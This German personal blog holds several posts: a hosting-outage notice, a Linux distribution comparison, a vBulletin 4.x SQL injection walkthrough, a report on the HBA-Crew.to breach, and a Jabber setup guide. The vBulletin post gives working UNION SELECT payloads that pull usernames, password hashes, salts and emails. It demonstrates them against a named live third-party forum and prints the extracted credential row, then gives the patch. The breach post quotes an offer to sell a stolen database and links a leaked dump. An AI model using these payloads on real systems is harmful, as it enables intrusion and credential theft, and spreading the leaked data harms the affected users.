Statement zur Downtime!

Ahoi,

nach ueber 5 Tagen Downtime ist mein Blog nun endlich wieder da, es hat alles laenger gedauert als erwartet und ueberhaupt erwartet hab ich die ganze Aktion nicht.

Was geschah?
Vorletzte Woche fand ich auf Webhostingtalk.com einen Thread ueber Breathost, dass dem Typ sein Server down war, ich dachte mir nichts großes dabei, da meiner noch online war und ich von einem “kleinen Problem” ausging.

Am 24.5.2011 gegen Mittag hab ich dann meinen Blog nicht mehr erreichen koennen, SSH war down und anpingen ließ sich ebenfalls nichts – ich dachte mir “gut, kann vorkommen” und hab ein Support Ticket erstellt.

Am 27.5.2011 gab es immernoch keine Reaktion / Antwort auf mein Support Ticket und langsam ahnte ich etwas boeses, vorallem wurde mir dann klar, dass das letzte Backup welches ich besaß von Februar 2011 ist. Ich hab daher an diesem Tag versucht das DC per eMail zu konktaktieren, leider erfolglos, weil die Antworten daraufhin so aussahen:

I am sorry but due to security reasons, we cannot disclose any information to you as you are not an authorized contact on any account.
Please contact your provider.

und nach Versuch 2 so:

I am sorry but we cannot fulfill any request unless it is from an authorized email.

Irgendwie ja auch nachvollziehbar. So wartete ich weiter ab.

Am 28.5.2011 hab ich die Domain dann auf einen Webspace von 2×4 umgeleitet, welchen ich noch besaß, um euch mehr oder weniger ueber die Situation aufzuklaeren.

Am 29.5.2011 entschied ich mich einen neuen Server zu holen (Nein, ich hoste nicht bei Heihachi 😉 ), welcher leider nur 1/3 an RAM im Vergleich zum alten vServer besitzt, daher musste ich den Webserver, PHP & MySQL optimieren, hab ihn fix funktionsfaehig gemacht und eingerichtet. Waehrendessen hatte ich das Backup von Februar lokal aufgespielt und mithilfe von Google Cache versucht, die Blogeintraege 1:1 wiederherzustellen, was mir auch gelungen ist. Es gab dann zwar Schwierigkeiten wegen der verschiedenen IDs an der URL, welche sich aber loesen ließen. Ein groesseres Problem waren die ganzen Kommentare, welche ich natuerlich auch uebernehmen wollte, aber das Datum von heute besitzen, da es einfach noch viel mehr Arbeit gewesen waere, dort das Datum und die Uhrzeit anzupassen. Nachdem ich lokal dann Software & Plugins, Partnerliste & Linkliste Up-to-Date gehalten hatte, machte ich davon schnell ein Backup und hab es fix auf den Server hochgeladen.

Wie geht es weiter?

Dieser Server hier wird erstmal als “temporaerer” Ausweichserver fuer die naechsten Wochen oder Monate dienen, ich stehe mehr oder weniger in Kontakt mit verschiedenen Hostern um ein Top Angebot fuer einen Top Blog (gnihihi) zu finden. Sobald ich etwas gefunden habe, werde ich den Server dann in ruhe einrichten und dann meinen Blog darauf umziehen.

Sollte mein alter vServer nochmal online kommen (was ich immernoch stark hoffe), dann werd ich davon erstmal ein komplettes Backup machen, um das ein oder andere hier zu ergaenzen, es fehlen Beispielsweise viele anderen Dateien und Dumps, welche ich mal hochgeladen/gemirrort hatte.

Hinweis an die TeamSpeak Kunden:
Da ich auf meinem alten vServer 4 oder 5 aktive TeamSpeak Server hatte, welche seit 5 Tagen offline sind muss ich mich vorallem bei euch entschuldigen, diesen Dienst nicht weiter fuehren zu koennen, da es mir a) an einem Backup vom TeamSpeak fehlt (ich besitze davon kein einziges) und b) vom Arbeitsspeicher her waere das auch zu knapp geworden. Es tut mir very Sorry! ich werde fruehstens wieder TeamSpeak Server verschenken, wenn der Umzug auf den neuen Server durch ist und ich mehr RAM zur Verfuegung habe.

Was bleibt noch zu sagen? Ja, ich werde in Zukunft oefters mal ein Backup machen 😀 Aber das sind so Situationen mit denen ich nie gerechnet haette – ich dachte ich kenne meinen Hoster und dann wird sowas abgezogen.. unglaublich.. Wuensch euch trotzdem noch einen tollen Start in die neue Woche und nochmal Sorry fuer die Downtime!

Linux – Umstieg auf ein freies Betriebssystem Teil 4

Ahoi,

heute folgt Teil vier meiner “Tutorialreihe”, dieses sollte eigentlich vor einem Monat kommen, aber hatte weder Zeit noch Lust dazu 😀 Allgemein ist grad wenig los, auch auf anderen Blogs – daher wollte ich euch nun Teil vier meiner Reihe vorstellen, in diesem Teil werde ich euch ein paar Linux Distributionen vorstellen. Die Installation anhand von 2 oder 3 Distributionen welche ich mit euch durchgehen werde folgt in einem anderen Teil.

Ich werde euch nur Linux Distributionen vorstellen, welche mir auf der “Desktop” Ebene gut gefallen, da gehoert Debian zum Beispiel leider nicht dazu, weil die Standard Repos einfach “zu alt” fuer die Desktop Anwendung ist – ich finde vorallem auf der Desktop Ebene sollte man relativ Up-to-Date sein und bei Debian muesste man dann mind. die Testing repo nehmen, aber nun zu meiner eigentlichen Vorstellung:

Ubuntu ( Kubuntu, Xubuntu, … alles das gleiche nur andere Desktop Environments, wie in Teil 3 beschrieben)
Vorteile:
+ Es ist _die_ perfekte Distribution fuer den Einstieg, man hat alles was man braucht und ein OS mit dem man sofort und einfach einsteigen bzw. “durchstarten” kann.
+ Auch an Programmen ist von Anfang an alles dabei und man kann erste Erfahrungen mit Linux sammeln, sprich sich mal die Verzeichnisse genauer ansehen oder das tolle Rechtesystem mit Root, “normaler” User und “sudo”.
+ Auch an Hardware Support mangelt es nicht, man muss sich (in der Regel) nicht mit Treibern rumschlagen.
+ Es gibt enorm viel Support, eine große bekannte (und gute) Seite dafuer ist ubuntuusers.de
+ Ubuntu basiert auf Debian und verwendet aktuellere Software (wer also Fan von Debian ist, aber auf aktuellere Software setzt, kann auf Ubuntu zugreifen) und benutzt APT (Advanced Packaging Tool) zur Paketverwaltung

Nachteile:
– Es wird teilweise “unfreie” Software verwendet und daher gibt es den ein oder anderen Streit bezueglich der Lizenz (davon merkt man als 0815 User eigentlich aber nichts)
– Dadurch das so viele Programme vorinstalliert sind, wird das OS fuer einige als “zu ueberfuellt” (und langsam?) abgestempelt
– Ubuntu hat als Linux Betriebssystem nicht das gleiche “Ansehen” wie andere Linux Distributionen, weshalb das so ist (aber eigentlich nicht stimmt) hat BuntspechT in einem tollen Blogeintrag beschrieben: http://buntspecht.us/2011/03/23/warum-ubuntu-gut-fuer-linux-ist/

Screenshot: *klick*

Fedora:
Vorteile:
+ basiert auf Red Hat Linux und verwendet yum (Yellowdog Updater Modified) zur Paketverwaltung
+ hat sich zum Ziel gesetzt, ein komplett freies Betriebssystem zu sein, welches keinerlei proprietäre (unfrei) oder patentbehaftete Software beinhaltet.
+ es wird aehnlich wie bei Ubuntu von Anfang an einiges an Software installiert, um den Start zu erleichtern
+ ebenfalls mangelt es nicht an Hardware Support
+ Support ist ebenfalls vorhanden, es gibt ein großes Wiki und eine Community

Nachteile:
– Dadurch das keine unfreie Software verwendet wird, muss man ein wenig nach Alternativen umsehen (bezueglich Flash zum Beispiel) oder auf repos setzen, welche “unfreie” Software verwenden um das ein oder andere nachzuinstallieren.

Screenshot: *klick*

Archlinux:
Vorteile:
+ basiert auf dem LFS (Linux From Scratch) nach dem KISS Prinzip (d.h. “das eine möglichst einfache Lösung eines Problems gewählt werden sollte”) und verwendet pacman zur Paketverwaltung
+ ist ein “Rolling Release”, d.h. das nicht wie bei anderen Distributionen zu bestimmten Abstaenden ein großes Update folgt, wo dann das meiste an Software auf “einen Schlag” aktualisiert wird, sondern es verwendet _immer_ die aktuellste Software, was meiner Meinung nach auf einem Desktop System ungemein wichtig ist. Daher macht es in dem Fall auch nichts aus, dass die letzte Arch CD version vom Mai 2010 ist, weil man durch ein update wieder auf dem neusten Stand ist.
+ Archlinux ist ein “minimal System”, d.h. du bestimmst von Anfang an, welcher Desktop genommen wird und welche Software du installiert haben moechtest.
+ ebenfalls gibt es einige Communitys und Wikis, wo du Support erhalten kannst

Nachteile:
(- Fuer Anfaenger, welche noch nie Linux angefasst haben wird Arch wohl etwas schwierig sein, allein weil man nicht weiß welche Software man braucht oder welchen Desktop, man kann sich zwar mithilfe von den hilfreichen Wikieintraegen durchkaempfen, aber so wie ich die meisten “User” kenne, sind sie zu “faul” oder nicht motiviert genug, sich die Wikieintraege / manpages durchzulesen und dann wird man bei der Installation scheitern oder etwas falsch machen)
– Dadurch das die Software stets up-to-date ist und die Testing Phase relativ kurz ist, kann es vorkommen, dass nach einem Update mal etwas nicht mehr richtig funktioniert (vorallem auf vServer ebene ist mir das schonmal passiert, weil sich die neuste Version von glibc mit openvz nicht vertragen hatte und es dann einen kernel panic gab, aber auch auf dem Desktop hatte ich nach einem Update probleme mit meinem Wlan Stick)

Screenshot gibts keinen, da jeder einen anderes Desktop Environment verwendet und/oder andere Software installiert.

Gentoo
Vorteile:
+ ist eine quellbasierte Linux-Meta-Distribution (vorallem fuer fortgeschrittene Linux-Benutzer)
+ ermoeglicht es das System von Anfang an individuell auf die eigenen beduerfnisse anzupassen
+ verwendet Portage zur Paketverwaltung, um sich eigene Pakete aus Quelltext zusammen zu bauen.
+ bietet ebenfalls Support durch eine Manual pages und Wikis

Nachteile:
– Hier ist es schwierig welche zu finden, weil ich nicht auflisten kann, dass “man muss den Kernel selber compilen, etc” dazu gehoert, weil einige Leute aus dem Grund auf Gentoo bestehen und das als Vorteil sehen.

Screenshot von einer Live DVD 10.0: *klick*

Fazit:
Das sind aus meiner Sicht die “besten” Desktop Systeme, mit SUSE hatte ich bisher noch nichts zu tun und habe euch 4 Distributionen vorgestellt, welche ihre eigenen Vor und Nachteile haben und mehr oder weniger verschieden sind, auch wenn sie alle auf den gleichen Kernel basieren.

Ich finde Ubuntu ist die Einsteigerdistribution, ich selbst hab es auch laenger als ein Jahr auf meinem Laptop benutzt und hatte nie irgendwelche großen Probleme damit. Es ist Anfaengerfreundlich gehalten und bereitet die “wenigsten” Probleme, als gute Alternative dazu eignet sich Fedora, jedoch muss man hier mit dem ein oder anderen Problem kaempfen, da es von Haus aus auf komplett freie Software setzt.

Nach Ubuntu bin ich dann zu Archlinux gewechselt, weil sich meine Beduerfnisse geaendert haben und ich bin damit eigentlich voll und ganz zufrieden. Es ist im prinzip ein gelungener Mix aus Gentoo und Debian, da es einerseits nen tollen Paketmanager hat, aber auch das compilen vom “Quellcode” aus dem AUR (Arch User Repository) einfach und schnell geht.

Gentoo ist dann eher was fuer die richtigen “Freaks”, welches ein system haben wollen, dass voll und ganz auf die eigenen Beduerfnisse passt.

Wer noch weitere Distributionen sehen mag, kann sich die Liste auf Wikipedia mal ansehen:
http://de.wikipedia.org/wiki/Liste_von_Linux-Distributionen

Es sind einfach zu viele, um auf jede einzelnd einzugehen, daher hoffe ich, dass euch mein “Mix” trotzdem gefallen hat – bis zum naechsten Teil!

vBulletin® 4.x SQL Injection Vulnerability

Ahoi,

Seit dem letzten Knueller von vBulletin, habe ich eigentlich nicht mehr mit einer gravierenden Luecke gerechnet. Doch am 05.04.2011 wurde dann ein “vBulletin 4.X Security Patch” veroeffentlicht. Inzwischen sind schon einige Tage vergangen und ich hoffe, dass der ein oder andere Admin sein Board inzwischen updated hat.

Interessant ist beispielsweise, dass es folgende Versionen betrifft:

vBulletin Publishing suite

  • 4.1.2
  • 4.1.1
  • 4.1.0 PL2
  • 4.0.8 PL2
  • 4.0.7
  • 4.0.6
  • 4.0.5
  • 4.0.4 PL1
  • 4.0.3 PL1
  • 4.0.2 PL4
  • 4.0.1
  • 4.0.0 PL1

vBulletin Forum classic

  • 4.1.2
  • 4.1.1
  • 4.1.0 PL2
  • 4.0.8 PL2
  • 4.0.7
  • 4.0.6 PL1
  • 4.0.5
  • 4.0.4 PL1
  • 4.0.3 PL1
  • 4.0.2 PL4
  • 4.0.1
  • 4.0.0 PL1

Kurz gesagt <= 4.1.2 | vBulletin 3.x ist davon nicht betroffen. Das ganze hoert sich interessant an - ist es auch! Wo befindet sich die Luecke?

Hinweis: Meine Zeilen beziehen sich auf die vB Version 4.1.2 – bei niedrigeren Versionen _kann_ die Zeilenangabe variieren, die Luecke ist aber die gleiche.

Dann schauen wir uns mal 2 Dateien an, zuerst die /vb/search/searchtools.php – dort gehen wir in Zeile 715, die in etwa so aussieht:

	public static function getDisplayString($table, $table_display, $fieldname, $key, $id, $comparator, $is_date)
	{
		global $vbulletin, $vbphrase;
		$names = array();
 
		if (is_array($id))
		{
			//If we have an array, we have to use equals.
			$sql = "SELECT DISTINCT $table.$fieldname from " . TABLE_PREFIX . "$table AS
				$table WHERE $key IN (" . implode(', ', $id) . ")";
 
			if ($rst = $vbulletin->db->query_read($sql))
			{
				while($row = $vbulletin->db->fetch_row($rst))
				{
					$names[] = $row[0];
				}
			}
 
			if (count($names) > 0)
			{
				return $table_display . ': ' . implode(', ', $names);
			}
		}
		else
		{
			//If we got here, we have a single value
			if ($row = $vbulletin->db->query_first("SELECT $table.$fieldname from " . TABLE_PREFIX . "$table AS
				$table WHERE $key = $id"))
			{
				return  $table_display . ' ' . self::getCompareString($comparator, $is_date)
					. ' ' . $row[0];
			}
		}
		return "";
	}

Vorallem die Variable $id ist nun fuer uns interessant, da sie in dieser Datei nicht gefiltert/ueberprueft wird.

Nun schauen wir, wo diese verwundbare Funktion verwendet wird und finden dann in /packages/vbforum/search/type/socialgroup.php Zeile 201 – 203:

vB_Search_Searchtools::getDisplayString('socialgroupcategory', $vbphrase['categories'],
 
					'title', 'socialgroupcategoryid', $value, vB_Search_Core::OP_EQ, true ));

Wenn wir das nun mit der obigen Funktion vergleichen:

	public static function getDisplayString($table, $table_display, $fieldname, $key, $id, $comparator, $is_date)
	{
		global $vbulletin, $vbphrase;
		$names = array();
 
		if (is_array($id))
		{

Wird es diese wohl sein 😉

Wie nutze ich das nun aus?

Wie oben gesehen, wird es wohl etwas mit den “socialgroups” also den “Gruppen” unter vBulletin und einer Suche dort zu tun haben. Ich werde euch _eine_ Moeglichkeit zeigen. wie ihr die Luecke ausnutzen koennt. Es empfiehlt sich ein Addon wie “Live HTTP Headers” (fuer Firefox) zu benutzen, da wir mit dem POST Parameter arbeiten werden.

Schauen wir uns mal die Suche (search.php) an:
Erstmal klicken wir auf “Search by Type” bzw. “Search Multiple Content Types”, waehlen dort dann “Gruppen” (bzw. Groups) aus und suchen am besten nach einer Gruppe, die auch existiert – ich werde es anhand von einem Live Beispiel demonstrieren.

Habe mir dieses Forum kurz geschnappt:
http://airoma.org/forum

Nun suchen wir nach “team”, da es ein paar Gruppen gibt, die den Text im Titel haben:

*Screenshot1*

Einen Treffer gibts auch:

*Screenshot2*

Schauen wir uns mal den POST Inhalt an, der in meinem Fall so aussieht:

type%5B%5D=7&query=team&titleonly=1&searchuser=&exactname=1&tag=&dosearch=Search+Now&searchdate=0&beforeafter=after&sortby=relevance&order=descending&saveprefs=1&s=&securitytoken=1302542927-d4cf038925f1bba6869e060b837d651371f1c0e0&do=process&searchthreadid=

Um nun die Luecke auszunutzen, haengen wir unsere SQL Injection hinten dran:

type%5B%5D=7&query=team&titleonly=1&searchuser=&exactname=1&tag=&dosearch=Search+Now&searchdate=0&beforeafter=after&sortby=relevance&order=descending&saveprefs=1&s=&securitytoken=1302542927-d4cf038925f1bba6869e060b837d651371f1c0e0&do=process&searchthreadid=&cat[0]=1) UNION SELECT 'haxhax' #

Und sieh an, sieh an:

*Screenshot3*

Eine eindeutige Ausgabe 🙂

Nun kann man zum Beispiel so weiter machen:

type%5B%5D=7&query=team&titleonly=1&searchuser=&exactname=1&tag=&dosearch=Search+Now&searchdate=0&beforeafter=after&sortby=relevance&order=descending&saveprefs=1&s=&securitytoken=1302542927-d4cf038925f1bba6869e060b837d651371f1c0e0&do=process&searchthreadid=&cat[0]=1) UNION SELECT concat_ws(0x3a,username,password,salt,email) FROM bulletinuser limit 1,1#

und siehe da:

*Screenshot4*

Richard™:cecc1cac4442df94e95eae0f02a0c64e:W&c$q#V}rD85C'D7~0,($cg,:/N:L#:[email protected]

Quasi owned 😉

Wie behebe ich die Luecke?

Als vB Kunde einfach den passenden Patch benutzen, auf vBulletin 4.1.3 updaten oder “von hand” schnell fixxen (ich werde die Methode zeigen, welche im Patch Level verwendet wurde):

/vb/search/searchtools.php

		$id = $vbulletin->db->sql_prepare($id);
		if (is_array($id))
		{

Sprich es wurde einfach “$id = $vbulletin->db->sql_prepare($id);” hinzugefuegt. Nun _muss_ noch die

/includes/class_core.php

editiert werden, naemlich:

Alt (Zeile 750):

	function sql_prepare($value)
	{
		if (is_string($value))
		{
			return "'" . $this->escape_string($value) . "'";
		}
		else if (is_numeric($value) AND $value + 0 == $value)
		{
			return $value;
		}
		else if (is_bool($value))
		{
			return $value ? 1 : 0;
		}
		else
		{
			return "'" . $this->escape_string($value) . "'";
		}
	}

Neu:

	function sql_prepare($value)
	{
		if (is_string($value))
		{
			return "'" . $this->escape_string($value) . "'";
		}
		else if (is_numeric($value) AND $value + 0 == $value)
		{
			return $value;
		}
		else if (is_bool($value))
		{
			return $value ? 1 : 0;
		}
		else if (is_null($value))
		{
			return "''";
		}
		else if (is_array($value))
		{
			foreach ($value as $key => $item)
			{
				$value[$key] = $this->sql_prepare($item);
			}
			return $value;
		}
		else
		{
			return "'" . $this->escape_string($value) . "'";
		}
	}

Soviel dazu erstmal, wuensch euch noch eine tolle Woche, mein naechstes Linux Tutorial folgt am Wochenende!

// Hinweis: Der Eintrag war damals http://j0hnx3r.org/?p=818 und ist nun ueber https://j0hnx3r.org/?p=818 bzw https://j0hnx3r.org/vbulletin-4-x-sql-injection-vulnerability/ erreichbar

HBA-Crew.to hacked!

Seit ein paar Stunden erhaelt man folgende Nachricht auf HBA-Crew.to:

Hacked by a pro of szene

Entschuldigt bitte, aber das konnten wir uns nicht nehmen lassen. Das ist also der von fred777 100% abgesicherte Server? Ein schlechter Scherz, mehr nicht…
Was habt ihr mit MyBB gemacht? Ihr enttäuscht uns.
Es werden keine IP’s gespeichert?

Wir haben euch kein Geld geklaut! Ihr User sollt nicht für den Mist bestraft werden den die Admins verbockt haben.

Solltet ihr an der Datenbank interessiert sein mit allen User / Passwort Hashes, dem 2nd & 3rd Level, und natürlich allen IP’s kontaktiert:
[email protected] ohne User Hashes und IP’s = 100 €
Datenbank unzensiert = 250 €

Die Administration kann uns gerne auch ein Angebot unterbreiten 😉

Bitte lasst euch das eine Leere sein und seid nicht so dumm wie carders!!

Man beachte das Wort “Leere” – wenn man schon vorgibt ein “Pro” zu sein, sollte man auf den ein oder anderen Fehler aufpassen – aber kann ja vorkommen.

Der zweite “Fehler” ist, dass die Datenbank fuer 250e (wtf?!) verkauft wird. Es steht noch nicht fest, ob die Trolle im Besitz der DB sind, Geld kann man so aber natuerlich schnell machen.
Da die Happy Ninjas natuerlich nicht wollen, dass Trolle Geld von Usern einkassieren, fuer Dinge welche sie schon lange besitzen (und womoeglich frueher oder spaeter publizieren wollten), haben sie eine Nachricht veroeffentlicht, welche ich euch nicht vorenthalten mag:

 447d843c775b0aab65b2801f1bdef9d7e1ced8fc
 
Sadly hba-crew has been owned today by some other moron (apparently an
inside job).  We  have to agree with the  defacement page  in that the 
server wasn't secured very well. However we cannot agree with that guy 
selling their database backup for ~250€.  Under these circumstances we 
are  forced  to publish  our own backup from their  forum, which dates 
back to approximately one month ago.  As you see,  hba-crew  has  been 
backdoored by us for quite a while;  actually since the first day they 
went back online.  We are sorry that this  is not an exp03 either. But 
do not shed hope.  Here is the hash that *hopefully* will be published 
in our next ezine: 49bd4433fff1b04530dcaff1f52fa971ff895871  
                                                    - the happy ninjas
 
ul.to mirror (sorry that anti-leech is down):
uploaded.to/file/70bsc2z8

Quelle: http://pastie.org/pastes/1749079/text?key=jraph3igo5n04x57hjizw

Wie ihr sehen koennt, erfolgte auch die SHA1 Hash Bestaetigung, um zu beweisen, dass der Text von den Happy Ninjas stammt und ich mir so etwas nicht ausdenke 😉

Ein Mirror (falls der Uploaded.to mal down/deleted sein sollte) ist hier: *klick*

Was bleibt noch zu sagen? Finde die Reaktion der Ninjas gut, die DB nun zu veroeffentlichen, damit keine anderen Trottel damit 250e kassieren (wenn sie ueberhaupt wirklich im Besitz der Datenbank sind). Abgesehen davon bin ich nun auf das Statement der Administration von HBA-Crew gespannt 🙂

Wuensch euch nen schoenen Sonntag!

Jabber – die Alternative zu ICQ & Co

Wie damals bei meinem OTR Tutorial kurz angedeutet, kann man natuerlich auf eine OTR Verschluesselung auch verzichten, jedoch muss man dann nicht unbedingt auf die Sicherheit verzichten. Eine wirklich tolle Alternative zu den bekannten Messengern (ICQ, MSN, Skype,..) bietet euch Jabber. Leider hat es sich trotz der ganzen Vorteile noch nicht richtig durchgesetzt, wohl wahrscheinlich aus dem Grund, dass ICQ & MSN bei Instant Messaging “Marktfuehrer” sind und es leider zu wenig Jabber User gibt. Vielleicht teilweise auch Unsicherheit oder Unwissenheit der User? Das soll mit diesem Blogeintrag nicht mehr lange so bleiben!

Was ist Jabber?

Jabber ist die Bezeichnung fuer das “Extensible Messaging and Presence Protocol” (kurz XMPP; auf Deutsch uebersetzt etwa “erweiterbares Nachrichten- und Anwesenheitsprotokoll”). Es ist ein als “Request for Comments” ( RFC 3920–3923 ) veroeffentlichter Internetstandard und wird hauptsaechlich fuer Instant Messaging genutzt.

Warum Jabber?

Es gibt sehr viele Vorteile gegenueber anderen Messengern. ICQ, MSN und Co sind so gesehen “Closed-Source” und beinhalten fiese Tuecken in ihren Nutzungsbedingungen – das Beispiel zu ICQ zeigte ich bereits damals schon, aber auch gerne noch einmal:

You agree that by posting any material or information anywhere on the ICQ Services and Information you surrender your copyright and any other proprietary right in the posted material or information. You further agree that ICQ LLC. is entitled to use at its own discretion any of the posted material or information in any manner it deems fit, including, but not limited to, publishing the material or distributing it.

Aus http://www.icq.com/legal/policy.html

Abgesehen davon ist es ICQ Nutzern beispielsweise nur moeglich andere ICQ Nutzer zu kontaktieren.
Da das Jabber Protokoll offen entwickelt und dokumentiert ist, kann prinzipiell jeder einen Jabber Server selber aufsetzen und nutzen. “Jabber” gehoert somit niemanden und es ist problemlos moeglich untereinander zu kommunizieren, egal auf welchem Server sich der “andere” befindet.

Die Entwicklung von Jabber ist aktiv, offen und es gibt eine menge Clients, welche das XMPP Protokoll unterstuetzen.

Natuerlich unterstuetzt auch Jabber beispielsweise die OTR Verschluesselung und so ist es nicht nur moeglich anonyme Server zu verwenden, sondern noch extra verschluesselte Nachrichten auszutauschen.

Wie kann ich Jabber verwenden?

In erster Linie ist es natuerlich (wie bei anderen Messengern auch) wichtig, einen Jabber-faehigen Client zu besitzen – sprich einer der das XMPP Protokoll unterstuetzt.

Es gibt einige “reine” Jabber Clients:
– Psi (Mac OS X, Unixoide, Windows)
– Spark (Mac OS X, Unixoide, Windows)
– Gajim (Unixoide, Windows)

Aber auch Multi Messenger, welche u.a. Jabber unterstuetzen:
– Pidgin (Mac OS X, Unixoide, Windows)
– QIP (Windows)
– Miranda IM (Windows)
– Trillian (Windows)
– Kopete Instant Messenger (Unixoide)
– Adium (Mac OS X)

Als naechstes brauchen wir eine Jabber-ID (JID), diese ist im prinzip so aufgebaut wie eine eMail Adresse, naemlich [email protected] – nun kommt eine der schwersten Entscheidungen, naemlich wo man sich eine JID anlegen moechte. Es gibt inzwischen viele Jabber Server um euch eine kleine Auswahl der bekannten zu geben:

– CCC Jabber Server (jabber.ccc.de)
Jabber.org
– SwissJabber.ch
hier ist eine Liste mit vielen anderen Servern

Jabber am Beispiel von Pidgin nutzen

Da ich selber Pidgin als Messenger benutze, werde ich euch noch schnell eine “Kurzanleitung” geben, um einen Jabber Client unter Pidgin hinzuzufuegen (ich benutze den Client auf Englisch):

a) Unter Accounts klickt ihr auf “Add”
b) Protocol: XMPP auswaehlen
c) Username: euren gewuenschten Usernamen eintragen
d) Domain: hier den Jabber Server eintragen, beispielsweise jabber.ccc.de
e) Resource: Ist ein optionales Feld, bei mir steht Beispielsweise “Fedora” drin, ist aber Wurst was ihr da eintragt.
f) Password: Dort kommt euer gewuenschtes Passwort rein – Haken bei “remember passwort” kann rein
g) Wenn ihr noch keinen Account bei dem Jabber Anbieter habt (in diesem Fall jabber.ccc.de), dann klickt ihr auf “Create this new account on the server”
h) Die restlichen Angaben sind optional, ein klick auf “Add” reicht, um den Account hinzuzufuegen und ggf. muesst ihr die Registrierung bestaetigen – sprich Username & Passwort nochmal eingeben.

Das wars dann, viel Spaß mit eurem Jabber Account! 🙂

Falls ihr noch Fragen oder Probleme habt, koennt ihr gerne einen Comment hinterlassen, Jabber ist meiner Meinung nach eine echt tolle Sache, welche leider von viel zu wenig Leuten genutzt wird, daher haben vorallem “Neulinge” bei dieser Sache meine vollste Unterstuetzung.

Ihr wollt noch mehr zum Thema “Jabber” wissen? Einige interessante Links sind noch hier:
Jabber – Wikipedia
Jabber Piratenwiki
Jabber – die freie Alternative

Wuensch euch schonmal ein tolles Wochenende!